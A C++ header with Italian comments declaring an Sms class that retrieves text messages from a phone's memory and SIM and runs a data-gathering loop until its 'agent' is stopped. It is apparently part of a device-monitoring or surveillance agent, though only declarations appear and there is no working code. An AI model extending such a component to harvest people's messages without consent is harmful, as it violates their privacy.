#include "Common.h"
#include <string>
#include <exception>
using namespace std;

#ifndef __Sms_h__
#define __Sms_h__

#include "Log.h"
#include "Status.h"

class Log;
class Status;
class Sms;

class Sms
{
	/**
	 * Utilizzato per scrivere i log.
	 */
	private: Log* logObj;
	private: Status statusObj;

	/**
	 * Riempie la struttura SmsStruct con l'SMS (preso dalla memoria del telefono) ottenuto dall'Id. Torna un puntatore alla lista contenente
	 * l'entry richiesta.
	 */
	private: list<SmsStruct*>* GetSmsByIndexFromPhone(UINT id);

	/**
	 * Riempie la struttura SmsStruct con l'SMS (preso dalla SIM) ottenuto dall'Id. Torna un puntatore alla lista contenente
	 * l'entry richiesta.
	 */
	private: list<SmsStruct*>* GetSmsByIndexFromSim(UINT id);

	/**
	 * Torna il numero di SMS presenti nella memoria del telefono o della SIM.
	 */
	private: UINT GetSmsNumber(UINT type);

	public:  Sms(UINT type);

	/**
	 * Loop infinito che effettua il gathering dei dati, esce con una ExitThread() quando viene richiesto lo stop
	 * dell'agente.
	 */
	public: void Run();
};

#endif
